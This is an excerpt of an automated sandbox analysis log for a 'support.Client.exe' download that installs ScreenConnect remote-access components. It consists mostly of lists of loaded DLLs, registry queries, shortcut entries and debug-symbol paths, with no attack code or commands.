              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exeSection loaded: apphelp.dll
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exeSection loaded: kernel.appcore.dll
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exeSection loaded: version.dll
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exeSection loaded: uxtheme.dll
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exeSection loaded: dfshim.dll
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exeSection loaded: urlmon.dll
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exeSection loaded: iertutil.dll
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exeSection loaded: srvcli.dll
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exeSection loaded: netutils.dll
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exeSection loaded: windows.storage.dll
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exeSection loaded: wldp.dll
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exeSection loaded: profapi.dll
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exeSection loaded: cryptsp.dll
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exeSection loaded: rsaenh.dll
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exeSection loaded: cryptbase.dll
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exeSection loaded: ntmarta.dll
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exeSection loaded: apphelp.dll
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exeSection loaded: mscoree.dll
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exeSection loaded: kernel.appcore.dll
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exeSection loaded: cryptsp.dll
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exeSection loaded: rsaenh.dll
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exeSection loaded: cryptbase.dll
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exeSection loaded: urlmon.dll
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exeSection loaded: iertutil.dll
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exeSection loaded: srvcli.dll
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exeSection loaded: netutils.dll
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exeSection loaded: sspicli.dll
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exeSection loaded: windows.storage.dll
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exeSection loaded: wldp.dll
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exeSection loaded: propsys.dll
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exeSection loaded: version.dll
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exeSection loaded: profapi.dll
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exeSection loaded: mscoree.dll
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exeSection loaded: kernel.appcore.dll
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exeSection loaded: cryptsp.dll
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exeSection loaded: rsaenh.dll
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exeSection loaded: cryptbase.dll
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exeSection loaded: urlmon.dll
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exeSection loaded: iertutil.dll
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exeSection loaded: srvcli.dll
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exeSection loaded: netutils.dll
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exeSection loaded: sspicli.dll
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exeSection loaded: windows.storage.dll
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exeSection loaded: wldp.dll
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exeSection loaded: propsys.dll
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exeSection loaded: version.dll
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exeSection loaded: profapi.dll
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exeSection loaded: dpapi.dll
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exeSection loaded: wtsapi32.dll
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exeSection loaded: winsta.dll
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exeSection loaded: netapi32.dll
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exeSection loaded: samcli.dll
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exeSection loaded: samlib.dll
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exeSection loaded: mswsock.dll
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exeSection loaded: dnsapi.dll
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exeSection loaded: iphlpapi.dll
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exeSection loaded: rasadhlp.dll
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exeSection loaded: userenv.dll
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exeSection loaded: fwpuclnt.dll
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exeSection loaded: dhcpcsvc6.dll
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exeSection loaded: dhcpcsvc.dll
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exeSection loaded: winnsi.dll
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exeSection loaded: mscoree.dll
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exeSection loaded: kernel.appcore.dll
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exeSection loaded: version.dll
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exeSection loaded: uxtheme.dll
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exeSection loaded: cryptsp.dll
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exeSection loaded: rsaenh.dll
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exeSection loaded: cryptbase.dll
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exeSection loaded: windows.storage.dll
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exeSection loaded: wldp.dll
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exeSection loaded: profapi.dll
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exeSection loaded: amsi.dll
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exeSection loaded: userenv.dll
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exeSection loaded: urlmon.dll
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exeSection loaded: iertutil.dll
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exeSection loaded: srvcli.dll
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exeSection loaded: netutils.dll
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exeSection loaded: sspicli.dll
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exeSection loaded: propsys.dll
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exeSection loaded: windowscodecs.dll
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exeSection loaded: ntmarta.dll
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exeSection loaded: wtsapi32.dll
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exeSection loaded: winsta.dll
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exeSection loaded: wbemcomn.dll
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exeSection loaded: netapi32.dll
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exeSection loaded: wkscli.dll
              Source: C:\Users\user\Downloads\support.Client.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00020420-0000-0000-C000-000000000046}\InprocServer32
              Source: Google Drive.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
              Source: YouTube.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
              Source: Sheets.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
              Source: Gmail.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
              Source: Slides.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
              Source: Docs.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
              Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsFileManager\obj\Release\ScreenConnect.WindowsFileManager.pdb source: ScreenConnect.WindowsFileManager.exe0.14.dr, ScreenConnect.WindowsFileManager.exe.14.dr
              Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Misc\Bootstrapper\Release\ClickOnceRunner.pdb source: support.Client.exe, 0000000D.00000000.1408916929.000000000025B000.00000002.00000001.01000000.00000006.sdmp, Unconfirmed 974768.crdownload.0.dr, chromecache_128.1.dr
              Source: Binary string: C:\builds\cc\cwcontrol\Product\ClientService\obj\Release\ScreenConnect.ClientService.pdb source: dfsvc.exe, 0000000E.00000002.2346639670.00000212A346A000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2346639670.00000212A36CE000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 00000012.00000002.1943559410.0000000002E62000.00000002.00000001.01000000.0000000E.sdmp, ScreenConnect.WindowsClient.exe, 00000014.00000002.2409619705.0000000003041000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000015.00000002.2004992616.00000000010D0000.00000004.08000000.00040000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000015.00000002.2005207241.0000000002A71000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.dll0.14.dr, ScreenConnect.ClientService.dll.14.dr
              Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetServiceRunner.pdb source: ScreenConnect.ClientService.exe, 00000012.00000000.1939664334.00000000007FD000.00000002.00000001.01000000.0000000D.sdmp, ScreenConnect.ClientService.exe.14.dr, ScreenConnect.ClientService.exe0.14.dr
              Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdb source: dfsvc.exe, 0000000E.00000002.2346639670.00000212A36CE000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2346639670.00000212A32A8000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000011.00000002.1949508964.000000001BB02000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Windows.dll.14.dr, ScreenConnect.Windows.dll0.14.dr
              Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsBackstageShell\obj\Release\ScreenConnect.WindowsBackstageShell.pdb source: ScreenConnect.WindowsBackstageShell.exe.14.dr, ScreenConnect.WindowsBackstageShell.exe0.14.dr
              Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdb source: ScreenConnect.WindowsClient.exe, 00000011.00000000.1931309778.0000000000782000.00000002.00000001.01000000.0000000C.sdmp, ScreenConnect.WindowsClient.exe0.14.dr, ScreenConnect.WindowsClient.exe.14.dr
              Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdb source: dfsvc.exe, 0000000E.00000002.2346639670.00000212A36CE000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2346639670.00000212A32A4000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000011.00000002.1946388041.00000000028C2000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.Client.dll0.14.dr, ScreenConnect.Client.dll.14.dr
              Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdb] source: dfsvc.exe, 0000000E.00000002.2346639670.00000212A36CE000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2346639670.00000212A32A4000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000011.00000002.1946388041.00000000028C2000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.Client.dll0.14.dr, ScreenConnect.Client.dll.14.dr
              Source: Binary string: C:\builds\cc\cwcontrol\Product\Core\obj\Release\net20\ScreenConnect.Core.pdbY/ source: dfsvc.exe, 0000000E.00000002.2346639670.00000212A329F000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2346639670.00000212A36CE000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 00000012.00000002.1944397148.0000000005402000.00000002.00000001.01000000.0000000F.sdmp, ScreenConnect.Core.dll0.14.dr, ScreenConnect.Core.dll.14.dr
              Source: Binary string: C:\builds\cc\cwcontrol\Product\Core\obj\Release\net20\ScreenConnect.Core.pdb source: dfsvc.exe, 0000000E.00000002.2346639670.00000212A329F000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2346639670.00000212A36CE000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 00000012.00000002.1944397148.0000000005402000.00000002.00000001.01000000.0000000F.sdmp, ScreenConnect.Core.dll0.14.dr, ScreenConnect.Core.dll.14.dr
